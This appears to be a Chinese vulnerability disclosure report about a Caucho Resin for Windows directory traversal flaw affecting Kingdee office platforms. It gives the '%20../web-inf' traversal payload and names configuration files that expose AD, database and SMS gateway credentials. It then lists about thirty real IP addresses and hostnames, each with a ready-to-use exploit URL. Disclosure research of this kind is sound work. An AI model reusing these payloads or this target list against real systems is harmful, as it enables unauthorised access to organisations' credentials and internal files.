### 简要描述:
Wooyun上关于Resin的相关漏洞相对较少,而且很多漏洞的准确性有待商榷(比如关于Resin的viewfile漏洞). 最近接触到Resin的漏洞,准备写一篇drop总结一下Resin的漏洞,所以需要收集一些案例, 下面是以金蝶某系统为例进行说明.
### 详细说明:
首先,得先说明一下本次需要利用的漏洞
Caucho Resin多个远程信息泄露漏洞(建议先阅读下面三个漏洞)
https://www.rapid7.com/resources/advisories/R7-0028.jsp
https://www.rapid7.com/resources/advisories/R7-0029.jsp
https://www.rapid7.com/resources/advisories/R7-0030.jsp
漏洞描述
Resin for Windows实现上存在多个漏洞,远程攻击者可能利用此漏洞非授权获取敏感信息。
Resin没有正确过滤通过URL传送的输入,允许远程攻击者通过在URL中提供有任意扩展名的DOS设备文件名从系统上的任意COM或LPT设备读取连续的数据流、通过目录遍历攻击泄露Web应用的WEB-INF目录中的文件内容,或通过包含有特殊字符的URL泄露到Caucho Resin服务器的完整系统路径。
测试代码:
http://www.example.com:8080/[path]/[device].[extension]
http://www.example.com:8080/%20../web-inf
http://www.example.com:8080/%20
http://www.example.com:8080/[path]/%20.xtp
漏洞危害:
通过此漏洞可以读取到串口设备的信息以及网站任意目录的文件遍历,我们这里之对Web相关的进行测试.
测试系统:
http://60.194.110.187/kingdee/login/loginpage.jsp
通过上面的漏洞,我们构造后的URL:
http://60.194.110.187/kingdee/%20../web-inf/
[<img src="https://images.seebug.org/upload/201507/12223920f54410927cbb245da2d42ce2920d5b09.png" alt="2015-07-12--001.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/12223920f54410927cbb245da2d42ce2920d5b09.png)
当然我们可以遍历Web目录下任何目录内容,通过信息挖掘知道Web目录下存在editor目录
[<img src="https://images.seebug.org/upload/201507/12223931eb9ba2350fe1f60585ffa19be5c2b54e.png" alt="2015-07-12--002.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/12223931eb9ba2350fe1f60585ffa19be5c2b54e.png)
总结:
此漏洞利用条件:
受影响系统:
Caucho Technology Resin v3.1.0 for Windows
Caucho Technology Resin v3.0.21 for Windows
Caucho Technology Resin v3.0.20 for Windows
Caucho Technology Resin v3.0.19 for Windows
Caucho Technology Resin v3.0.18 for Windows
Caucho Technology Resin v3.0.17 for Windows
Caucho Technology Resin Professional v3.1.0 for Window
注意:Windows平台的Resin受此漏洞影响
/*************************** 以上就是关于Resin漏洞的说明 *******************/
下面说明金蝶协同办公平台,金蝶基于Resin的协同办公平台引用了存在此组件因此导致目录遍历。 金蝶基于安全考虑,将很多配置文件和代码存放在web-inf目录,冤大头。
目前泄露的配置有:
/web-inf/classes/ad_config.conf AD域服务器账号和密码(当然是配置的情况下)
[<img src="https://images.seebug.org/upload/201507/12223940309064a0dc2092e25da491241a9b90ce.png" alt="2015-07-12--003.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/12223940309064a0dc2092e25da491241a9b90ce.png)
/web-inf/classes/ctop.conf ctop数据库账号和密码
[<img src="https://images.seebug.org/upload/201507/1222394879cd7d3500f25e4b707dd24c4d0d7156.png" alt="2015-07-12--004.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/1222394879cd7d3500f25e4b707dd24c4d0d7156.png)
/web-inf/classes/sms_config.conf 短信网关
我发现Web根目录还有存在两个目录 /editor & /disk
[<img src="https://images.seebug.org/upload/201507/12223957f9a3ee543498546462016607111b87a5.png" alt="2015-07-12--005.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/12223957f9a3ee543498546462016607111b87a5.png)
(FCKEditor)
[<img src="https://images.seebug.org/upload/201507/12224007816983f72e9f9677192aa3da5f0da1bd.png" alt="2015-07-12--006.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/12224007816983f72e9f9677192aa3da5f0da1bd.png)
(各种未授权访问&用户信息泄露)
最可笑的是,这里不用利用Resin的漏洞可以目录遍历
http://60.194.110.187/kingdee/editor/
http://60.194.110.187/kingdee/disk/
[<img src="https://images.seebug.org/upload/201507/12224244d96c2dc07a2e3dd057fe173b24e6a118.png" alt="2015-07-11--009.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/12224244d96c2dc07a2e3dd057fe173b24e6a118.png)
就用你做这个案例了
### 漏洞证明:
为了证明这个漏洞的通用性,当然需要证明一下通用。
用Zoomeye和FoFa大约统计了一下,处于互联网的此系统大约有上百个,下面简单罗列一下
http://60.194.110.187/kingdee/%20../web-inf/
http://61.190.20.51/kingdee/%20../web-inf/
http://60.220.220.162:8080/ctop/%20../web-inf/
http://61.146.237.104:8080/kingdee/%20.../web-inf/
http://122.139.60.103:800/kingdee/%20../web-inf/
http://bluesun.com.cn:8080/%20../web-inf/
http://oa.cimri.cc:8090/kingdee/%20../web-inf/
http://oa.guanhao.com:8080/kingdee/%20../web-inf/
http://222.179.238.182:8082/kingdee/%20../web-inf/
http://58.22.49.189:8080/kingdee/%20../web-inf/
http://223.95.183.6:8080/kingdee/%20../web-inf/
http://222.168.29.170:81/kingdee/%20../web-inf/
http://222.134.77.23:8080/kingdee/%20../web-inf/
http://222.133.44.10:8080/kingdee/%20../web-inf/
http://222.72.132.71:8080/ctop/%20../web-inf/
http://222.72.133.79/ctop/%20../web-inf/
http://221.226.149.17:8080/kingdee/%20../web-inf/
http://221.214.220.19:8080/ctop/%20../web-inf/
http://221.4.245.218:8080/kingdee/%20../web-inf/
http://220.248.45.50:8080/ctop/%20../web-inf/
http://220.179.119.210:8080/ctop/%20../web-inf/
220.180.150.241:8080/ctop/login/%20../web-inf/
http://220.180.150.241:8080/ctop/%20../web-inf/
220.189.244.202:8080/kingdee/%20../web-inf/
http://220.189.244.202:8080/kingdee/%20../web-inf/
220.178.198.101/ctop/%20../web-inf/
http://220.178.198.101/ctop/%20../web-inf/
219.159.83.81:8080/ctop/%20../web-inf/
http://219.159.83.81:8080/ctop/%20../web-inf/
京公网安备 11010502034610号
暂无评论